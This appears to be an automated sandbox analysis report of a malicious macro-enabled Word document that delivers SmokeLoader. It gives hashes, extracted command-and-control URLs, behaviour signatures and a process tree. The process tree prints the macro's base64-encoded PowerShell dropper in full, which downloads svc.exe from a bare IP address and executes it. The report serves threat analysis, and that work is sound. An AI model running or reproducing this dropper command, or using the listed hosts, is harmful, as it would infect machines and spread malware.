Analysis
-
max time kernel
150s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
24-05-2024 13:07
General
-
Target
616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0.docm
-
Size
518KB
-
MD5
1f2d795ca29afadf24325cfbb3f60e4e
-
SHA1
d5e05bf7300a09b6706082907e726b0d5a09e550
-
SHA256
616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0
-
SHA512
40ff395e3e62e9c0b47d9ec088129042b26ceeee28c76c23615086c33fcbc57250a8c4ea53464dfd5398a5e023743dca988d7c86ec1f6039a873d8b3352393b7
-
SSDEEP
6144:sEc+F+HLHNIvPl8qZDC9VT8L38S8WyI6OLxoq5seCsH8BB3y8dqtUO2TsyUrOSo:sEcJHNopZW9eLH8WyITLfyXXvqxj9o
Malware Config
Extracted
http://94.232.249.161/download/svc.exe
Extracted
smokeloader
2022
http://rafraystore.ru/index.php
http://picwalldoor.ru/index.php
http://agentsuperpupervinil.ru/index.php
http://vivianstyler.ru/index.php
http://sephoraofficetz.ru/index.php
http://vikompalion.ru/index.php
http://ccbaminumpot.ru/index.php
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 4 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0.docm"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzk0LjIzMi4yNDkuMTYxL2Rvd25sb2FkL3N2Yy5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmMuZXhlIjsgJFdlYi5Eb3dubG9hZEZpbGUoJFVybCwgJFB0aCk7IEludm9rZS1FeHByZXNzaW9uICRQdGg7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzk0LjIzMi4yNDkuMTYxL2Rvd25sb2FkL3N2Yy5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmMuZXhlIjsgJFdlYi5Eb3dubG9hZEZpbGUoJFVybCwgJFB0aCk7IEludm9rZS1FeHByZXNzaW9uICRQdGg7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA5ADQALgAyADMAMgAuADIANAA5AC4AMQA2ADEALwBkAG8AdwBuAGwAbwBhAGQALwBzAHYAYwAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAC4AZQB4AGUAIgA7ACAAJABXAGUAYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABVAHIAbAAsACAAJABQAHQAaAApADsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAFAAdABoADsA4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svc.exe"C:\Users\Admin\AppData\Local\Temp\svc.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD548caf0286974c79b80e98004a2ad0739
SHA198d1af8656ac1df1fe7239a15bcbe7383b13745b
SHA256bca293dd8c7bb90f5cf2df18c719435f6bf9228652b2b1cd05617db550dba7dd
SHA512d7449a2c652e6331021371cceee7a0266de855da4f5e7bab6f4ccec8a6e2c62063f69a2f1d27973b8441ec4e24207f1272fb735d96eb670eff7306c0a92d82e0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD55338c613181ac96c44b0cc4cc8912e50
SHA146c2717a1e32d6d880802f2eda60b82282cabafb
SHA2561b8d6e9144518caf4aeb036c5f2b6e9763dfd193f96f6c6ee8ec92ba7bf52c84
SHA5127408315866fdb39f596d157e2392e01ae32231aef53375d486997654b5474bd8c28ebe64c5fc13462c723246eaae691a2cc1644e7ac98e72b8dfa727d4cd0f9a
-
\Users\Admin\AppData\Local\Temp\svc.exeFilesize
180KB
MD592c57dd80b764a028749520017d44e76
SHA1f732220adaacf23de6cc69d964341766d2e350d9
SHA256dbd741a45d840d06d708339f9e9824f2a0d745ea6537ca44bff233ba7441bfda
SHA512dd7d363fef5750a256abc2ae43d17f8e4788d392afaa74a2085f34da05efeb12373f38fbf480e1c86eb2759c667c971c7c54512f5d59ee61f5a0a4341ac406c8
-
memory/1180-36-0x0000000002DA0000-0x0000000002DB6000-memory.dmpFilesize
88KB
-
memory/2304-37-0x0000000000400000-0x0000000002349000-memory.dmpFilesize
31.3MB
-
memory/2404-16-0x0000000002F60000-0x0000000002FBB000-memory.dmpFilesize
364KB
-
memory/2780-40-0x00000000719CD000-0x00000000719D8000-memory.dmpFilesize
44KB
-
memory/2780-6-0x00000000051F0000-0x00000000052F0000-memory.dmpFilesize
1024KB
-
memory/2780-7-0x00000000051F0000-0x00000000052F0000-memory.dmpFilesize
1024KB
-
memory/2780-5-0x00000000051F0000-0x00000000052F0000-memory.dmpFilesize
1024KB
-
memory/2780-2-0x00000000719CD000-0x00000000719D8000-memory.dmpFilesize
44KB
-
memory/2780-0-0x000000002F861000-0x000000002F862000-memory.dmpFilesize
4KB
-
memory/2780-41-0x00000000051F0000-0x00000000052F0000-memory.dmpFilesize
1024KB
-
memory/2780-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2780-64-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2964-22-0x0000000005B90000-0x0000000005BEB000-memory.dmpFilesize
364KB